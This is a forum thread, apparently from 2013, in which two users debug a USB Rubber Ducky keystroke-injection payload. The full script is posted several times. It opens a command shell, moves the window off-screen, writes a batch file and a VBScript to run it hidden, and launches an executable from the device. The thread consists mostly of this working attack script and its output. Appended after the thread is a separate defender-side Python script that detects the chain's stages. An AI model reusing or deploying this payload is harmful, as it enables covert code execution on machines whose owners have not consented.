mahorelee (thread author), posted June 24, 2013

I got the payload to work, but not with the .exe file I need it to work with. It will auto-open Paint or a calculator .exe file, but not this certain .exe file I have. The .exe file I have auto-extracts documents and computer files into a folder. I have no idea why it will not work with this .exe but will with any other I have tried. The payload executes everything fine, but the .exe does not open. This is the payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd Any help would be great. Thanks.

overwraith, posted June 24, 2013 (edited)

I tried it with the batch payload I posted, and the target file does indeed create a Message.txt in the desired location on the target computer. So, the batch logic that waits for the drive to be mounted appears to be working.

C:\Windows\system32>erase /Q DuckyWait.bat

C:\Windows\system32>copy con DuckyWait.bat
:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
if Exist %myd% (
goto :break
)
timeout /t 30
goto :while1
:break
%myd%\MyExe.bat
^Z
        1 file(s) copied.

C:\Windows\system32>erase /Q invis.vbs

C:\Windows\system32>copy con invis.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
^Z
        1 file(s) copied.

C:\Windows\system32>wscript.exe invis.vbs DuckyWait.bat

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

File Not Found

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

06/24/2013  02:07 PM                17 Message.txt
               1 File(s)             17 bytes
               0 Dir(s)  555,544,006,656 bytes free

C:\Windows\system32>

I also tried it with one of my Hello World executables, and observed that the output appears to either be suppressed, or is not launching the executable. I am trying to figure out which of the preceding scenarios is actually occurring.

Edited July 2, 2013 by overwraith

mahorelee (thread author), posted June 24, 2013

Yes, the same is happening to me, but you said it way better. Thank you for looking into it.

overwraith, posted June 24, 2013 (edited)

I got it; need to add the START command before the executable name on that line in the batch file, ex...

Line:
STRING %myd%\myEXE.bat

change to...
STRING START %myd%\myEXE.exe

Have now updated the payload to reflect this change.

Edited June 24, 2013 by overwraith

mahorelee (thread author), posted June 25, 2013

Now I am getting this error when I used the new script you posted.

overwraith, posted June 25, 2013 (edited)

Looks like GitHub added a few new lines where there weren't supposed to be any. I think I deleted them all now. Look for lines that look like they are supposed to be on one line, but are divided into two lines. ex...

STRING HELLO WORLD
ENTER

Here is another post of the payload I am using to launch my hello world executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

Edited July 2, 2013 by overwraith

overwraith, posted June 25, 2013 (edited)

I tried this out on another Windows 7 computer, and now I am getting the same error that you are. The computer is refusing to write to the System32 folder. I believe that this has something to do with Windows Firewall, or something. I don't know if I will be able to find a solution to this particular problem. Simply changing the output folder may solve this particular problem.

Edited June 25, 2013 by overwraith

mahorelee (thread author), posted June 26, 2013

I wonder why the old code didn't have this problem but the new code does. I added STRING START %myd%\myEXE.exe in the old code but it did not work; however, it did not give me any errors like in the new code. Also, why would a different output folder affect it if it cannot find the invis.vbs?

overwraith, posted June 26, 2013 (edited)

I am putting a change directory command in the code so it will switch to the temp directory. The System32 folder appears to now be write protected by some process on the Windows 7 system. If anyone knows what is write protecting it I would like to know. Here is updated code, this should work. I have no idea why it is not allowing us to write there; my system allows it just fine.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

When I was having the error on the other computer I was talking about, copy con would act like it was going to work, and when I pressed enter to enter a line of code it hung, giving me an error about access being denied or something. Later on the script calls invis.vbs, which consequently does not exist, which causes the popup box you posted. I actually didn't change that much in the code; the part that adds invis.vbs is exactly the same. I am betting that Microsoft rolled out some kind of a patch between testing the first version and the second version, which is why we are seeing different results. Whatever security setting is preventing the writing is probably turned off on my computer.

Edited July 2, 2013 by overwraith

mahorelee (thread author), posted July 2, 2013

I just tried the new code and it is still not working for me. I don't get the error any more, but it will not run a notepad.exe renamed to HelloWorld like it did before, or a HelloWorld.exe program. It does all that's in the picture but never runs the exit string for some reason, and no program is run. If you need more details just ask; I don't see why it wouldn't be working for me.

overwraith, posted July 2, 2013 (edited)

Sorry, this one is my fault. Missed a couple of colons in the script. Will go back and change other payloads so other people don't copy and paste the mistake. Here is the script you want.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

Edited July 2, 2013 by overwraith

mahorelee (thread author), posted July 2, 2013 (edited)

It now runs all the way through the cmd prompt, but neither .exe will run.

Edited July 2, 2013 by mahorelee

overwraith, posted July 2, 2013

I am sorry for the trouble you are having, mahorelee. Unfortunately this script is fairly complex, and when I originally posted it online there were problems I still needed to iron out. I believe the script is now in working order, as it runs fine on my computer, so odds are the problem is on your end. Please post another picture of what the script does when it runs. Also, post which operating system you have. Also post what happens when you simply run the batch script by itself without the Visual Basic file making it execute silently. I will need a print screen of that. EX...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\UserName>DuckyWait.bat

Here are also some things that could be going wrong.

- Make sure you have the right firmware (Twin Duck).
- Make sure you are waiting for the ducky drive to mount, and after it mounts wait 1 minute at least.
- Make sure you are compiling and running on the same computer, so there are no architecture issues.
- Make sure you have a running executable file, and perhaps one you coded yourself. If you know C++, here is the hello world executable I am using at the bottom of the page. There is a copy file command in it so that it copies itself to the desktop when it runs, but I commented it out for you. If you use it, change the field UserName.
- Make sure the executable file is on the root of the ducky.
- Make sure you updated the text file with the source code in it.
- Make sure you copied the .inf file to the root of the drive.
- Make sure you re-named the ducky drive "DUCKY".

#include <iostream>
#include <Windows.h>
using namespace std;

int main(){
    //CopyFileA("HelloWorld.exe", "C:\\Users\\UserName\\Desktop\\HelloWorld.exe",0);
    cout << "Hello World!!!" << endl;
    system("pause");
}//end main

I am still thinking about what this could be, so I will check back here frequently.

mahorelee (thread author), posted July 2, 2013

Okay, thank you for your help.

I do have TwinDuck.
I have left my Ducky in for a while each time, so I do not think that is the problem.
I am running on the same computer (Windows 7).
I do not know C++; I know Java and Python. But I have been using the default notepad exe file located on all Windows and another exe I found. (I can make a hello world exe file with C++ if you think that would help; it would just take an hour or so.)
The exe file is on the root (see picture).
Text file is updated.
***I do not know what the .inf file is, so that is not on the root of the Ducky. That might be the problem.
Drive is renamed to DUCKY.
The inject.bin is on the root of the drive too.

I will do troubleshooting and take screenshots here shortly if the .inf file is not the problem.

overwraith, posted July 2, 2013 (edited)

Forget about the .inf file, I forgot we use bin files. Also, how does one paste images into this forum? I can't find the option.

Edited July 2, 2013 by overwraith

mahorelee (thread author), posted July 2, 2013

Okay, I will start doing what you asked. And below the yellow smiley face and a little to the left is an image button. You need to upload your picture to a site like Photobucket, then use the link to the image and plug it in.

mahorelee (thread author), posted July 2, 2013

Here is what happens when the inject.bin is run. It does this in cmd, then exits out, and the .exe never opens. I do not understand how to run the batch file. Do I go to cmd to get to it?

overwraith, posted July 2, 2013 (edited)

I see what is going wrong now; when you copied and pasted it, I think the website may have changed its formatting or something. In the for loop the 'd' should be a 'do'. Here is my output for the program. You run the batch file simply by typing "DuckyWait.bat" into the command prompt.

Edited July 2, 2013 by overwraith

mahorelee (thread author), posted July 2, 2013

I posted the wrong picture; that was from before. This is the new one. Here is what happens when I run DuckyWait.bat. (How did I get that batch file in the first place?) When the ducky mounts on my computer it mounts as (E), for the record.

overwraith, posted July 2, 2013 (edited)

I have altered the payload posted earlier in this forum; please copy and paste the last one that I posted in this forum. Even if it looks like you already got the payload, I may have used the edit feature to change it. The last posting of the payload should correct your error. There are colons missing in the copy that you got. Also, my script uses the command line command "copy con" to generate DuckyWait.bat.

Edited July 3, 2013 by overwraith

mahorelee (thread author), posted July 2, 2013

The last posting of the code says last edited at 2:55 pm today. I tried it, however, and I get this in the cmd, and the exit string does not get executed.

overwraith, posted July 5, 2013 (edited)

It is not in %appdata%, it is in %temp%. I probably commented out the exit string so you could see what it is doing; just un-comment it.

Edited July 5, 2013 by overwraith

mahorelee (thread author), posted July 5, 2013

It still does not run the exe. I tried going into the drive manually in the cmd and running it, and it runs fine. So I do not know why it's not working. Is there any troubleshooting I can do for you that would help narrow down the problem?

mahorelee (thread author), posted July 5, 2013 (edited)

This is what happens when I run DuckyWait.bat. This pops up really fast, but nothing else happens. When searching for wscript.exe nothing comes up; invis.vbs does show up.

Edited July 5, 2013 by mahorelee

overwraith, posted July 5, 2013

You do not have the correct version of the code; copy and paste this in and it will work.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

And just in case it doesn't work, here is a different version with a slight tweak.

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

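As an added, defender-side example that is not part of this thread or of the payload's own code: a small triage script that walks constructed process-creation records looking for the four observable stages of the chain the payloads above produce (a cmd.exe opened from the Run dialog with /K, a wmic or diskpart volume listing to find the DUCKY drive, wscript.exe running a .vbs with a .bat argument, and an executable started from the root of a non-system drive). The key=value log format, the sample events and the rule names are assumptions made for the example.

```python
"""Triage process-creation events for the chain built up in this thread: cmd.exe from the Run
dialog, a wmic/diskpart volume listing, a .vbs that launches a .bat, an EXE off another drive."""
import re

# Constructed sample events in a simple key=value line format (not real Sysmon/EDR output).
SAMPLE_EVENTS = [
    r'parent=explorer.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /Q /D /T:7F /F:OFF /V:ON /K"',
    r'parent=cmd.exe image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic volume get driveletter, label"',
    r'parent=cmd.exe image=C:\Windows\System32\wscript.exe cmdline="wscript.exe invis.vbs DuckyWait.bat"',
    r'parent=cmd.exe image=C:\Windows\System32\diskpart.exe cmdline="diskpart"',
    r'parent=cmd.exe image=E:\HelloWorld.exe cmdline="E:\HelloWorld.exe"',
    r'parent=explorer.exe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"',
]
LINE_RE = re.compile(r'parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"')

def parse_event(line):
    """Split one constructed log line into its parent / image / cmdline fields."""
    m = LINE_RE.fullmatch(line.strip())
    if m is None:
        raise ValueError(f"unparseable event: {line!r}")
    return m.groupdict()

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def run_dialog_cmd(ev):
    # Win+R -> "cmd ... /K": an interactive shell spawned by explorer.exe and kept open with /K.
    return (ev["parent"].lower() == "explorer.exe" and _base(ev["image"]) == "cmd.exe"
            and "/k" in ev["cmdline"].lower())

def volume_enumeration(ev):
    # Both variants posted in the thread: "wmic volume get driveletter, label" and "list volume | diskpart".
    cl = ev["cmdline"].lower()
    if _base(ev["image"]) == "wmic.exe":
        return "volume" in cl and "driveletter" in cl
    return _base(ev["image"]) == "diskpart.exe" and ev["parent"].lower() == "cmd.exe"

def hidden_vbs_launcher(ev):
    # wscript/cscript running a .vbs whose argument is a batch file (the invis.vbs trick).
    return (_base(ev["image"]) in ("wscript.exe", "cscript.exe")
            and re.search(r"\.vbs\b.*\.(bat|cmd)\b", ev["cmdline"], re.IGNORECASE) is not None)

def exe_from_foreign_drive_root(ev):
    # "START %myd%\HelloWorld.exe": a binary at the root of a drive other than C:, child of cmd.exe.
    return (ev["parent"].lower() == "cmd.exe"
            and re.fullmatch(r"[d-z]:\\[^\\]+\.exe", ev["image"], re.IGNORECASE) is not None)

RULES = [("run_dialog_cmd", run_dialog_cmd), ("volume_enumeration", volume_enumeration),
         ("hidden_vbs_launcher", hidden_vbs_launcher),
         ("exe_from_foreign_drive_root", exe_from_foreign_drive_root)]

def triage(lines):
    """Return one hit per event that matched at least one rule, naming the matched rules."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        matched = [name for name, rule in RULES if rule(ev)]
        if matched:
            hits.append({"cmdline": ev["cmdline"], "rules": matched})
    return hits

def chain_coverage(lines):
    """Number of distinct chain stages observed; 4 means every stage of the payload was seen."""
    return len({name for hit in triage(lines) for name in hit["rules"]})
```

Each rule on its own fires on ordinary administration too (an interactive cmd with /K, a one-off diskpart), so the useful signal is chain_coverage climbing towards 4 on one host within a short window, not any single hit.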